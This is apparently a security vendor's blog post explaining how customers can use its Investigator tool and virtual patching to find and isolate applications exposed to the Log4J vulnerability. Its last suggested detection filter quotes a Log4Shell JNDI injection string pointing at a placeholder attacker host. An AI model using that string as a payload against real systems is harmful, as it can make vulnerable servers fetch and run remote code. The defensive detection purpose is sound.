The internet has seemingly been on fire the past week regarding Log4J, so unless you’ve been living under a rock the past week, there’s no reason dive into a detailed explanation of what it is. This post is meant to help Minerva customers understand how they can leverage Minerva to make sure they are protected from Log4J vulnerabilities.

 

The log4J vulnerability is an inherit vulnerability that affects all users differently according to their application and uses of the Log4J library. While Minerva’s software can be very useful to mitigate and reduce risk, there is no “one size fits all” solution for all customers and applications.

In general the investigator tool can be used to quickly and efficiently identify all applications which use Log4J and then use Minerva virtual patching (isolate vulnerable applications before official patch is made available by the vendor) to “vaccinate” those particular tools.
We have a number of customers who have successfully implemented this approach and we have received very positive feedback. None of our customers have reported suffering attacks through the Log4J vulnerability.
It is also important to note that Minerva’s software is not susceptible to the Log4J exploits.

 

Here are few suggestions for filters you might want to check with Investigator:

1. Process name contains Log4J
2. Process command line contains Log4J
3. Process command line contains ${jndi:ldap://attacker.com/a}